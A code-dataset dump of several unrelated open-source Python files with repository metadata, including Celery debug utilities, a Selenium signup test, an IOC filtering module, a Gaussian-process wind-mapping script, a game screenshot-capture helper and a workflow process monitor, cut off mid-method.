] | null | null | null | scaper_concept/venv/lib/python3.9/site-packages/celery/utils/debug.py | edudbot/web-scraper | 12c07f805427699b2c3a35ed7c0d7efbc3673a7f | [
"MIT"
] | null | null | null | """Utilities for debugging memory usage, blocking calls, etc."""
import os
import sys
import traceback
from contextlib import contextmanager
from functools import partial
from pprint import pprint
from celery.platforms import signals
from celery.utils.text import WhateverIO
try:
from psutil import Process
except ImportError:
Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
'humanbytes', 'mem_rss', 'ps', 'cry',
)
# Byte-size units for humanbytes(), ordered largest divisor first so the
# first matching entry wins.
UNITS = (
    (2 ** 40.0, 'TB'),
    (2 ** 30.0, 'GB'),
    (2 ** 20.0, 'MB'),
    (2 ** 10.0, 'KB'),
    (0.0, 'b'),
)

_process = None  # cached psutil.Process for this pid (see ps())
_mem_sample = []  # RSS samples collected by sample_mem()
def _on_blocking(signum, frame):
import inspect
raise RuntimeError(
f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}'
)
@contextmanager
def blockdetection(timeout):
    """Context that raises an exception if process is blocking.

    Uses ``SIGALRM`` to detect blocking functions.
    """
    if not timeout:
        yield
    else:
        old_handler = signals['ALRM']
        # Don't restore our own handler if it was already installed
        # (re-entrant use of this context).
        old_handler = None if old_handler == _on_blocking else old_handler

        signals['ALRM'] = _on_blocking
        try:
            yield signals.arm_alarm(timeout)
        finally:
            if old_handler:
                signals['ALRM'] = old_handler
            signals.reset_alarm()
def sample_mem():
    """Sample RSS memory usage.

    Statistics can then be output by calling :func:`memdump`.

    Returns the humanized RSS string (or None when psutil is missing);
    the sample is appended to the module-level ``_mem_sample`` list.
    """
    current_rss = mem_rss()
    _mem_sample.append(current_rss)
    return current_rss
def _memdump(samples=10):  # pragma: no cover
    """Return (sampled RSS history, RSS after gc.collect) and clear samples."""
    S = _mem_sample
    # Down-sample the history to at most `samples` entries.
    prev = list(S) if len(S) <= samples else sample(S, samples)
    _mem_sample[:] = []
    import gc
    gc.collect()
    after_collect = mem_rss()
    return prev, after_collect
def memdump(samples=10, file=None):  # pragma: no cover
    """Dump memory statistics.

    Will print a sample of all RSS memory samples added by
    calling :func:`sample_mem`, and in addition print
    used RSS memory after :func:`gc.collect`.
    """
    say = partial(print, file=file)
    if ps() is None:
        say('- rss: (psutil not installed).')
        return
    prev, after_collect = _memdump(samples)
    if prev:
        say('- rss (sample):')
        for mem in prev:
            say(f'- > {mem},')
    # Humanized RSS remaining after garbage collection.
    say(f'- rss (end): {after_collect}.')
def sample(x, n, k=0):
    """Yield a sample of at most ``n`` items from the sequence `x`.

    For example, if `n` is 10 and `x` has 100 items, every tenth item is
    yielded.  ``k`` can be used as a start offset.

    If `x` has fewer than ``n`` items, each item from ``k`` onwards is
    yielded once.  (Previously the stride degenerated to 0 in that case,
    yielding the first item ``n`` times.)
    """
    # Stride between sampled items; never let it collapse to 0.
    j = max(len(x) // n, 1)
    for _ in range(n):
        try:
            yield x[k]
        except IndexError:
            break
        k += j
def hfloat(f, p=5):
    """Convert float to value suitable for humans.

    Arguments:
        f (float): The floating point number.
        p (int): Floating point precision (default is 5).
    """
    truncated = int(f)
    if truncated == f:
        # Whole number: drop the fractional part entirely.
        return truncated
    return '{0:.{p}}'.format(f, p=p)
def humanbytes(s):
    """Convert bytes to human-readable form (e.g., KB, MB)."""
    # First (largest) unit whose threshold ``s`` reaches; the final
    # (0.0, 'b') entry in UNITS guarantees a match for s >= 0.
    return next(
        f'{hfloat(s / div if div else s)}{unit}'
        for div, unit in UNITS if s >= div
    )
def mem_rss():
    """Return RSS memory usage as a humanized string."""
    p = ps()
    # Implicitly returns None when psutil is unavailable (ps() is None).
    if p is not None:
        return humanbytes(_process_memory_info(p).rss)
def ps():  # pragma: no cover
    """Return the global :class:`psutil.Process` instance.

    Note:
        Returns :const:`None` if :pypi:`psutil` is not installed.
    """
    global _process
    # Lazily create and cache the Process handle for the current PID.
    if _process is None and Process is not None:
        _process = Process(os.getpid())
    return _process
def _process_memory_info(process):
    # Prefer ``memory_info``; fall back to the older ``get_memory_info``
    # spelling when the attribute is missing.
    try:
        return process.memory_info()
    except AttributeError:
        return process.get_memory_info()
def cry(out=None, sepchr='=', seplen=49):  # pragma: no cover
    """Return stack-trace of all active threads.

    See Also:
        Taken from https://gist.github.com/737056.
    """
    import threading
    out = WhateverIO() if out is None else out
    P = partial(print, file=out)
    # get a map of threads by their ID so we can print their names
    # during the traceback dump
    tmap = {t.ident: t for t in threading.enumerate()}
    sep = sepchr * seplen
    # sys._current_frames() maps thread id -> topmost frame for every
    # Python thread in this interpreter.
    for tid, frame in sys._current_frames().items():
        thread = tmap.get(tid)
        if not thread:
            # skip old junk (left-overs from a fork)
            continue
        P(f'{thread.name}')
        P(sep)
        traceback.print_stack(frame, file=out)
        P(sep)
        P('LOCAL VARIABLES')
        P(sep)
        pprint(frame.f_locals, stream=out)
        P('\n')
    return out.getvalue()
| 24.273196 | 76 | 0.6031 | 0 | 0 | 911 | 0.193459 | 549 | 0.116585 | 0 | 0 | 1,793 | 0.38076 |
3517beedd46a5471e67dd32647db03c5051f3de7 | 5,038 | py | Python | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 377 | 2015-01-06T11:27:43.000Z | 2022-03-15T04:17:06.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 1,239 | 2015-01-01T14:05:18.000Z | 2022-03-30T06:00:39.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 176 | 2015-01-04T13:51:28.000Z | 2022-03-30T19:49:54.000Z | #!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal
print 'Trustroots Selenium tests'
# URL is passed as an argument
if len(sys.argv) > 1:
test_url = sys.argv[1]
# Default to localhost
else:
test_url = 'http://localhost:3000/'
print 'Testing URL: ' + test_url
class Main:
    # Runs the TestSuite once per browser capability, either against a
    # local WebDriver or a remote BrowserStack session.
    def __init__(self):
        try:
            from config_browserstack import browserstack_url
            no_browserstack = 0
        except ImportError:
            no_browserstack = 1
        # NOTE(review): this unconditionally forces no_browserstack = 1,
        # disabling BrowserStack even when the import above succeeded —
        # presumably a temporary debug override; confirm before relying on it.
        no_browserstack = 1
        for cap in browsers:
            if cap['env'] == 'remote' and no_browserstack:
                if no_browserstack == 1:
                    # Print the warning only once.
                    print 'sorry, no browserstack'
                    no_browserstack = 2 # Should be cleaner
            else:
                if cap['env'] == 'local':
                    driver = getattr(webdriver, cap['browser'])()
                else:
                    print 'launching', cap
                    driver = webdriver.Remote(
                        command_executor=browserstack_url,
                        desired_capabilities=cap
                    )
                try:
                    self.t = TestSuite(driver, cap, test_url)
                except:
                    print sys.exc_info()
                finally:
                    # Always release remote sessions; local drivers are
                    # intentionally left open.
                    if cap['env'] == 'remote':
                        driver.quit()
class TestSuite:
    # End-to-end Selenium smoke tests for Trustroots: signup, map search,
    # and sign-in by username and by email.  (Python 2 script.)
    def __init__(self, driver, cap, url):
        self.wait = WebDriverWait(driver, 15)
        self.driver = driver
        self.cap = cap
        self.url = url

        def signal_handler(signal, frame):
            # Ctrl+C: try to close the browser before exiting.
            print('Handling Ctrl+C!')
            if hasattr(self, 'driver') and self.driver:
                print 'Trying driver.quit()'
                self.driver.quit()
            sys.exit(0)
        signal.signal(signal.SIGINT, signal_handler)

        try:
            self.run_tests()
        except:
            print cap
            print sys.exc_info()

    def run_tests(self):
        # Generate a unique throwaway account per run.
        self.username = 'tester' + str(time.time())[5:10]
        self.email = self.username + '@example.tld'
        self.password = 'Tester123'
        self.driver.get(self.url)
        self.test_signup()
        self.test_home_map()
        self.test_logout_signin()
        self.test_logout_signin_email()

    def test_signup(self):
        # Fill and submit the signup form, then wait for the profile edit
        # button that confirms a successful registration.
        if not "Trustroots" in self.driver.title:
            raise Exception("Unable to load page!")
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
        if not 'Trustroots' in self.driver.title:
            raise Exception("Unable to load page!")
        self._wait_and_click(self.driver.find_element_by_id, 'firstName')
        self.driver.find_element_by_id('firstName').send_keys('Tester')
        self.driver.find_element_by_id('lastName').send_keys('Tester')
        self.driver.find_element_by_id('username').send_keys(self.username)
        self.driver.find_element_by_id('email').send_keys(self.email)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
        self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')

    def test_logout_signin(self):
        # Sign out, then sign back in using the username.
        self.driver.get(self.url + 'auth/signout')
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
        self.driver.find_element_by_id('username').send_keys(self.username)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')

    def test_logout_signin_email(self):
        # Sign out, then sign back in using the email address instead.
        self.driver.get(self.url + 'auth/signout')
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
        self.driver.find_element_by_id('username').send_keys(self.email)
        self.driver.find_element_by_id('password').send_keys(self.password)
        self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')

    def test_home_map(self):
        # Navigate home via the brand logo and run a map search.
        self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
        self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)

    def _assert_contains_regexp(self, regexp):
        text_found = re.search(regexp, self.driver.page_source)
        print text_found
        assert text_found != None

    def _wait_and_click_id(self, _id, pause=0):
        self._wait_and_click(self.driver.find_element_by_id, _id, pause)

    def _wait_and_click(self, func, param, pause=0):
        # Wait for the element to be displayed, then click it.
        # NOTE(review): the pause != 0 branch calls self._sleep, which is
        # not defined anywhere in this class — it would raise
        # AttributeError; confirm whether it should be time.sleep(pause).
        if pause == 0:
            self.wait.until(lambda _: func(param).is_displayed())
        else:
            self._sleep(pause)
        func(param).click()
m = Main()
| 33.812081 | 95 | 0.645693 | 4,426 | 0.878523 | 0 | 0 | 0 | 0 | 0 | 0 | 707 | 0.140333 |
351a506b1b2ee7c86af3ebc3248a1ec939c3dd9d | 1,845 | py | Python | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 2 | 2019-03-19T12:25:42.000Z | 2019-03-19T12:27:34.000Z | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 7 | 2019-03-28T17:32:33.000Z | 2020-06-17T10:45:20.000Z | lib/dcsotiesplunk/filtering.py | satta/TIE-Splunk-TA | 8d4636b96dfb63b4ca7b38f21d1c8a2d8dde392b | [
"BSD-3-Clause"
] | 1 | 2021-08-23T15:22:36.000Z | 2021-08-23T15:22:36.000Z | # Copyright (c) 2017, 2020, DCSO GmbH
import json
import sys
import os
# we change the path so that this app can run within the Splunk environment
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "lib"))
from dcsotie.errors import TIEError
from dcsotiesplunk.logger import get_logger
logger = get_logger().getChild('.filtering')
DATA_TYPE_FILTER_MAP = {
'IPv4': 'ip',
'URLVerbatim': 'url',
'DomainName': 'dom',
}
def filter_iocs(iocs, filters, fp=sys.stdout):
    """Write the IOCs passing the configured filters to *fp* as JSON lines.

    Per-data-type filters take precedence (keys ``ip_*``, ``url_*``,
    ``dom_*`` via DATA_TYPE_FILTER_MAP); otherwise the generic
    'confidence'/'severity' filters apply.  IOCs with unparsable numeric
    fields are logged and skipped.  Filter values are expected to expose
    ``in_range``; anything else surfaces as a TIEError.
    """
    # Template for per-data-type filter cache entries (filled lazily below).
    tmpl_filters = {
        'confidence': None,
        'max_severity': None
    }
    filter_cache = {}
    for ioc in iocs:
        try:
            max_confidence = int(ioc['max_confidence'])
        except (TypeError, ValueError):
            logger.error("bad value for max_confidence; was {}".format(ioc['max_confidence']))
            continue
        try:
            max_severity = int(ioc['max_severity'])
        except (TypeError, ValueError):
            logger.error("bad value for max_severity; was {}".format(ioc['max_severity']))
            continue
        dt = ioc['data_type']
        try:
            f = filter_cache[dt]
        except KeyError:
            # warm up: resolve the filter pair for this data type once.
            f = filter_cache[dt] = tmpl_filters.copy()
            try:
                p = DATA_TYPE_FILTER_MAP[ioc['data_type']]
                f['confidence'] = filters[p + '_confidence']
                f['max_severity'] = filters[p + '_severity']
            except KeyError:
                # No type-specific filter configured; use the generic one.
                f['confidence'] = filters['confidence']
                f['max_severity'] = filters['severity']
        try:
            if (f['confidence'].in_range(max_confidence)
                    and f['max_severity'].in_range(max_severity)):
                print(json.dumps(ioc), file=fp)
        except AttributeError as exc:
            raise TIEError(str(exc))
| 29.758065 | 94 | 0.577236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 493 | 0.267209 |
351cb7437ced7acc5333179d8ad7d5cb015b6375 | 7,388 | py | Python | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | tests/mapping_wind02.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/python3
import sys
sys.path.append('../../')
import numpy as np
import numpy.fft as npfft
import matplotlib.pyplot as plt
from matplotlib import animation
import time
from netCDF4 import MFDataset
from nephelae_simulation.mesonh_interface import MesoNHVariable
from nephelae_base.types import Position
from nephelae_base.types import Bounds
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process import kernels as gpk
class WindKernel(gpk.Kernel):
    """Wind-advected squared-exponential kernel over (t, x, y) inputs.

    Kernel compatible with sklearn.gaussian_process.Kernel
    to be used in GaussianProcessRegressor.
    /!\\ Hyper parameter optimization HAS NOT BEEN TESTED.
    When using with GaussianProcessRegressor, set optimizer=None.
    /!\\ Only implemented for dimension (t,x,y) for now for testing purposes.

    Spatial coordinates are shifted by windSpeed * dt before computing the
    squared distance, so correlation follows the advected air mass.

    NOTE(review): despite its name, ``noiseStddev`` is added directly to
    the covariance diagonal, i.e. it is treated as a noise *variance*
    (callers in this script pass ``noiseStddev**2``) — confirm before reuse.
    """

    def __init__(self, lengthScale=None, stddev=1.0, noiseStddev=0.1,
                 windSpeed=None):
        # Use None sentinels instead of mutable list defaults (the previous
        # [1.0,1.0,1.0]/[0.0,0.0] defaults were shared across instances).
        self.lengthScale = [1.0, 1.0, 1.0] if lengthScale is None else lengthScale
        self.stddev = stddev
        self.noiseStddev = noiseStddev
        self.windSpeed = [0.0, 0.0] if windSpeed is None else windSpeed

    def __call__(self, X, Y=None):
        """Return the covariance matrix K(X, Y); K(X, X) gets the noise diagonal."""
        if Y is None:
            Y = X
        cop = False
        # Far from most efficient but efficiency requires C++ implementation (or is it ?)
        t0, t1 = np.meshgrid(X[:, 0], Y[:, 0], indexing='ij', copy=cop)
        dt = t1 - t0
        distMat = (dt / self.lengthScale[0])**2
        # x coordinate, advected by the wind over dt.
        x0, x1 = np.meshgrid(X[:, 1], Y[:, 1], indexing='ij', copy=cop)
        dx = x1 - (x0 + self.windSpeed[0] * dt)
        distMat = distMat + (dx / self.lengthScale[1])**2
        # y coordinate, advected by the wind over dt.
        x0, x1 = np.meshgrid(X[:, 2], Y[:, 2], indexing='ij', copy=cop)
        dx = x1 - (x0 + self.windSpeed[1] * dt)
        distMat = distMat + (dx / self.lengthScale[2])**2
        if Y is X:
            # Training covariance: add the noise term on the diagonal.
            return self.stddev*np.exp(-0.5*distMat) + np.diag([self.noiseStddev]*X.shape[0])
        else:
            return self.stddev*np.exp(-0.5*distMat)

    def diag(self, X):
        """Diagonal of K(X, X) without building the full matrix."""
        return np.array([self.stddev + self.noiseStddev]*X.shape[0])

    def is_stationary(self):
        # Depends only on coordinate differences, hence stationary.
        return True
mesonhPath = '/home/pnarvor/work/nephelae/data/MesoNH-2019-02/REFHR.1.ARMCu.4D.nc'
rct = MesoNHVariable(MFDataset(mesonhPath), 'RCT')
# Estimating advective wind
ut = MesoNHVariable(MFDataset(mesonhPath), 'UT')[50.0, 1100.0,:,:].data.mean()
vt = MesoNHVariable(MFDataset(mesonhPath), 'VT')[50.0, 1100.0,:,:].data.mean()
print("Advective wind :", [ut, vt])
rctSlice = rct[240,1100,:,:].data
print("Variance : ", (rctSlice**2).mean())
t = np.linspace(0,300.0,300)
# a0 = 400.0
a0 = 250.0
f0 = - 1 / 120.0
# f0 = 1 / 150.0
a1 = 0.0
# f1 = 1.5*f0
f1 = 2.5*f0
# f1 = -1.3*f0
# f1 = -2.5*f0
# f1 = -4.5*f0
tStart = 50.0
tEnd = 700.0
t = np.linspace(tStart, tEnd, int(tEnd - tStart))
# p0 = Position(240.0, 1700.0, 2000.0, 1100.0)
# p0 = Position(50.0, 0.0, 2000.0, 1100.0)
p0 = Position(50.0, 100.0, 1950.0, 1100.0)
p = np.array([[p0.t, p0.x, p0.y, p0.z]]*len(t))
# v0 = np.array([[9.09, 0.68]])
v0 = np.array([8.5, 0.9])
p[:,0] = t
p[:,1] = p[:,1] + a0*(a1 + np.cos(2*np.pi*f1*(t-t[0])))*np.cos(2*np.pi*f0*(t-t[0]))
p[:,2] = p[:,2] + a0*(a1 + np.cos(2*np.pi*f1*(t-t[0])))*np.sin(2*np.pi*f0*(t-t[0]))
print("Max velocity relative to wind :",
max(np.sqrt(np.sum((p[1:,1:3] - p[:-1,1:3])**2, axis=1)) / (p[1:,0] - p[:-1,0])))
p[:,1:3] = p[:,1:3] + (t - tStart).reshape([len(t), 1]) @ v0.reshape([1,2])
# building prediction locations
# X0,Y0 = np.meshgrid(
# np.linspace(rct.bounds[3][0], rct.bounds[3][-1], rct.shape[3]),
# np.linspace(rct.bounds[2][0], rct.bounds[2][-1], rct.shape[2]))
b = rct.bounds
yBounds = [min(p[:,2]), max(p[:,2])]
tmp = rct[p0.t,p0.z,yBounds[0]:yBounds[1],:]
X0,Y0 = np.meshgrid(
np.linspace(tmp.bounds[1][0], tmp.bounds[1][-1], tmp.shape[1]),
np.linspace(tmp.bounds[0][0], tmp.bounds[0][-1], tmp.shape[0]))
xyLocations = np.array([[0]*X0.shape[0]*X0.shape[1], X0.ravel(), Y0.ravel()]).T
b[2].min = yBounds[0]
b[2].max = yBounds[1]
# Kernel
processVariance = 1.0e-8
noiseStddev = 0.1 * np.sqrt(processVariance)
# lengthScales = [100, 50, 50]
# lengthScales = [70, 50, 50]
lengthScales = [70, 60, 60]
# lengthScales = [140, 120, 120]
kernel0 = WindKernel(lengthScales, processVariance, noiseStddev**2, v0)
rctValues = []
print("Getting rct values... ", end='')
sys.stdout.flush()
for pos in p:
rctValues.append(rct[pos[0],pos[3],pos[2],pos[1]])
rctValues = np.array(rctValues)
print("Done !")
sys.stdout.flush()
noise = noiseStddev*np.random.randn(rctValues.shape[0])
rctValues = rctValues + noise
# # plotting rct values
# fig, axes = plt.subplots(1,1)
# axes.plot(p[:,0], np.array(rctValues))
# profiling = False
profiling = True
if not profiling:
fig, axes = plt.subplots(3,1,sharex=True,sharey=True)
simTime = p0.t
lastTime = time.time()
simSpeed = 50.0
def do_update(t):
    """Fit a GP on recent measurements and (unless profiling) redraw the maps.

    Uses module-level globals: p/rctValues (trajectory + samples), kernel0,
    lengthScales, xyLocations, X0, rct, p0, yBounds, b, tStart, profiling.
    """
    print("Sim time :", t)
    # prediction
    gprProcessor0 = GaussianProcessRegressor(kernel0,
                                             alpha=0.0,
                                             optimizer=None,
                                             copy_X_train=False)
    # trainSet = np.array([list(pos) + [rctVal] \
    #                      for pos, rctVal in zip(p[:,0:3],rctValues)\
    #                      if pos[0] < t and pos[0] > t - 2*lengthScales[0]])
    # Keep only samples within the last 3 temporal length scales.
    trainSet = np.array([list(pos) + [rctVal] \
                         for pos, rctVal in zip(p[:,0:3],rctValues)\
                         if pos[0] < t and pos[0] > t - 3*lengthScales[0]])
    print("Number of used measures samples :", trainSet.shape[0])
    gprProcessor0.fit(trainSet[:,:-1], trainSet[:,-1])
    xyLocations[:,0] = t
    map0, std0 = gprProcessor0.predict(xyLocations, return_std=True)
    # Cloud water content cannot be negative; clamp the posterior mean.
    map0[map0 < 0.0] = 0.0
    map0 = map0.reshape(X0.shape)
    std0 = std0.reshape(X0.shape)
    # display
    if not profiling:
        global axes
        axes[0].cla()
        axes[0].imshow(rct[t,p0.z,yBounds[0]:yBounds[1],:].data, origin='lower',
                       extent=[b[3].min, b[3].max, b[2].min, b[2].max])
        axes[0].grid()
        axes[0].set_title("Ground truth")
        try:
            # Overlay the trajectory flown so far.
            axes[0].plot(p[:int(t-tStart + 0.5),1], p[:int(t-tStart + 0.5),2], '.')
        finally:
            pass
        axes[1].cla()
        axes[1].imshow(map0, origin='lower',
                       extent=[b[3].min, b[3].max, b[2].min, b[2].max])
        axes[1].grid()
        axes[1].set_title("MAP")
        axes[2].cla()
        axes[2].imshow(std0**2, origin='lower',
                       extent=[b[3].min, b[3].max, b[2].min, b[2].max])
        axes[2].grid()
        axes[2].set_title("Variance AP")
def init():
    # FuncAnimation init callback; nothing to set up.
    pass
def update(i):
    """Animation/profiling step: advance simulated time by 2 s and redraw."""
    # global lastTime
    global simTime
    # currentTime = time.time()
    # simTime = simTime + simSpeed*(currentTime - lastTime)
    # lastTime = currentTime
    # simTime = simTime + 5.0
    simTime = simTime + 2.0
    do_update(simTime)
if not profiling:
anim = animation.FuncAnimation(
fig,
update,
init_func=init,
interval = 1)
plt.show(block=False)
else:
t0 = time.time()
while simTime < 600:
update(0)
print("Ellapsed :", time.time() - t0, "s")
| 30.03252 | 92 | 0.577829 | 1,794 | 0.242826 | 0 | 0 | 0 | 0 | 0 | 0 | 1,821 | 0.246481 |
351dc4da7ea35617cf860d3eec0ce499004d3deb | 1,432 | py | Python | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | interaction.py | BAFurtado/TLD | 7f6d8b0f1cfa0a03a30676058e84a1afa7dd273a | [
"MIT"
] | null | null | null | # coding: utf-8
# Originally from
# https://github.com/PPartisan/THE_LONG_DARK
# Simply adapted to LINUX by Bernardo Alves Furtado
import threading
import time
import psutil
from pylab import rcParams
from pynput.keyboard import Key, Controller
import mapping
rcParams['figure.figsize'] = 12, 9.5
def is_tld_running():
    """Return True if The Long Dark process ('tld.x86_64') is running.

    The previous version returned True unconditionally, which made the
    process scan below unreachable and the capture loop run forever.
    """
    for pid in psutil.pids():
        try:
            if psutil.Process(pid).name() == 'tld.x86_64':
                return True
        except psutil.NoSuchProcess:
            # Process exited between pids() and Process(); ignore it.
            continue
    return False
def background(func, args):
    """Run ``func(*args)`` on a new thread and return the Thread object.

    Returning the thread (previously None) lets callers join or monitor
    it; existing callers that ignore the return value are unaffected.
    """
    th = threading.Thread(target=func, args=args)
    th.start()
    return th
class Interaction:
    """Automates TLD map capture: repeatedly presses F8 and converts the
    resulting screenshots into coordinates via the ``mapping`` module."""

    def __init__(self):
        # Master switch checked once before the capture loop starts.
        self.recording = True
        self.keyboard = Controller()

    def start_recording(self):
        """Enable the capture loop."""
        print('Started recording')
        self.recording = True

    def stop_recording(self):
        """Disable the capture loop (checked before it starts)."""
        print('Stopped recording')
        self.recording = False

    def press(self):
        """Simulate a single F8 key press (presumably TLD's screenshot key)."""
        print(f'Pressed the button')
        self.keyboard.press(Key.f8)
        self.keyboard.release(Key.f8)

    def start_interactive_mapping(self, s_path, f_path):
        """Every 30 s while TLD runs: press F8, read coordinates from the
        screenshots in *s_path*, append them to ``coords.txt`` under
        *f_path*, then delete the screenshots."""
        print(f'Started!')
        if self.recording:
            while is_tld_running():
                self.press()
                coord = mapping.read_coords_from_screenshots(s_path)
                mapping.write_coords_to_file(coord, f_path + "coords.txt", "a")
                mapping.delete_screenshots(s_path)
                time.sleep(30)
| 23.866667 | 79 | 0.643855 | 844 | 0.589385 | 0 | 0 | 0 | 0 | 0 | 0 | 240 | 0.167598 |
3520d3fadcd76025a840929f26fb7ddd09ba91b1 | 7,205 | py | Python | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | null | null | null | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | 20 | 2019-05-21T10:33:36.000Z | 2019-12-11T08:13:29.000Z | multiply_ui/server/resources/workflows/multiply_workflow.py | RaT0M/multiply-ui | ad7fffb15cc962604340b31b38d34bc470fa8448 | [
"MIT"
] | 1 | 2020-10-14T12:32:36.000Z | 2020-10-14T12:32:36.000Z | import logging
import os
import signal
import sys
from pmonitor import PMonitor
logging.getLogger().setLevel(logging.INFO)
class MultiplyMonitor(PMonitor):
    """PMonitor subclass that tracks per-command progress, logs, PIDs and
    cancellation for MULTIPLY workflow steps run on localhost."""

    def __init__(self, parameters, types):
        PMonitor.__init__(self,
                          ['none', parameters['data_root']],
                          request=parameters['requestName'],
                          hosts=[('localhost', 10)],
                          types=types,
                          logdir=parameters['log_dir'],
                          simulation='simulation' in parameters and parameters['simulation'])
        # Per-command bookkeeping (keyed by the full command line string).
        self._tasks_progress = {}
        self._lower_script_progress = {}
        self._upper_script_progress = {}
        self._processor_logs = {}
        self._pids = {}
        self._to_be_cancelled = []
        self._cancelled = []

    def _observe_step(self, call, inputs, outputs, parameters, code):
        # Register an already-finished (code <= 0) step's command so it is
        # not re-executed.
        if code > 0:
            return
        if self._script:
            command = '{0} {1} {2} {3} {4}'.format(self._path_of_call(self._script), call, ' '.join(parameters),
                                                   ' '.join(inputs), ' '.join(outputs))
        else:
            command = '{0} {1} {2} {3}'.format(self._path_of_call(call), ' '.join(parameters), ' '.join(inputs),
                                               ' '.join(outputs))
        print(f'observing {command}')
        self._commands.add(command)

    def _run_step(self, task_id, host, command, output_paths, log_prefix, async_):
        """
        Executes command on host, collects output paths if any, returns exit code
        """
        wd = self._prepare_working_dir(task_id)
        process = PMonitor._start_processor(command, host, wd)
        # Remember the PID so cancel() can signal the process later.
        self._pids[command] = process.pid
        self._trace_processor_output(output_paths, process, task_id, command, wd, log_prefix, async_)
        process.stdout.close()
        code = process.wait()
        return code

    def _trace_processor_output(self, output_paths, process, task_id, command, wd, log_prefix, async_):
        """
        traces processor output, recognises 'output=' lines, writes all lines to trace file in working dir.
        for async calls reads external ID from stdout.
        """
        if self._cache is None or self._logdir != '.':
            trace = open('{0}/{1}-{2:04d}.out'.format(self._logdir, log_prefix, task_id), 'w')
        else:
            trace = open('{0}/{1}-{2:04d}.out'.format(wd, log_prefix, task_id), 'w')
        line = None
        if command not in self._processor_logs:
            self._processor_logs[command] = []
        for l in process.stdout:
            line = l.decode()
            if line.startswith('output='):
                output_paths.append(line[7:].strip())
            elif line.startswith('INFO:ScriptProgress'):
                # "INFO:ScriptProgress:<lower>-<upper>" sets the progress
                # range the current component spans.
                script_progress = line.split(':')[-1].split('-')
                self._lower_script_progress[command] = int(script_progress[0])
                self._upper_script_progress[command] = int(script_progress[1])
                self._tasks_progress[command] = int(script_progress[0])
            elif line.startswith('INFO:ComponentProgress'):
                # Component progress (0-100) is mapped linearly into the
                # current [lower, upper] script-progress range.
                component_progress = line.split(':')[-1]
                if command in self._upper_script_progress and command in self._lower_script_progress:
                    progress_diff = float(self._upper_script_progress[command] - self._lower_script_progress[command])
                    relative_progress = int((float(component_progress) * progress_diff) / 100.0)
                    self._tasks_progress[command] = self._lower_script_progress[command] + relative_progress
            else:
                self._processor_logs[command].append(line)
            trace.write(line)
        trace.flush()
        trace.close()
        if async_ and line:
            # assumption that last line contains external ID, with stderr mixed with stdout
            output_paths[:] = []
            output_paths.append(line.strip())

    def get_progress(self, command):
        """Return the last observed progress (0-100-ish) for *command*."""
        if command in self._tasks_progress:
            return self._tasks_progress[command]
        return 0

    def get_logs(self, command):
        """Return the non-progress stdout lines collected for *command*."""
        if command in self._processor_logs:
            return self._processor_logs[command]
        return []

    def run(self):
        """Block until all steps finish; -1 if any step was cancelled."""
        code = self.wait_for_completion()
        if len(self._cancelled) > 0:
            return -1
        return code

    def cancel(self):
        """Send SIGTERM to all known step processes and mark them cancelled."""
        for pid in self._pids:
            try:
                os.kill(self._pids[pid], signal.SIGTERM)
                logging.info(f'Cancelling {pid}')
                self._to_be_cancelled.append(pid)
            except ProcessLookupError:
                # okay, process was outdated
                continue

    def _write_status(self, with_backlog=False):
        # Rewrite the status file in place: summary line, then one line per
        # failed (f), cancelled (c), running (r), and optionally backlog (b) step.
        self._status.seek(0)
        self._status.write('{0} created, {1} running, {2} backlog, {3} processed, {4} failed, {5} cancelled\n'. \
                           format(self._created, len(self._running), len(self._backlog), self._processed,
                                  len(self._failed), len(self._cancelled)))
        for l in self._failed:
            self._status.write('f {0}\n'.format(l))
        for l in self._cancelled:
            self._status.write('c {0}\n'.format(l))
        for l in self._running:
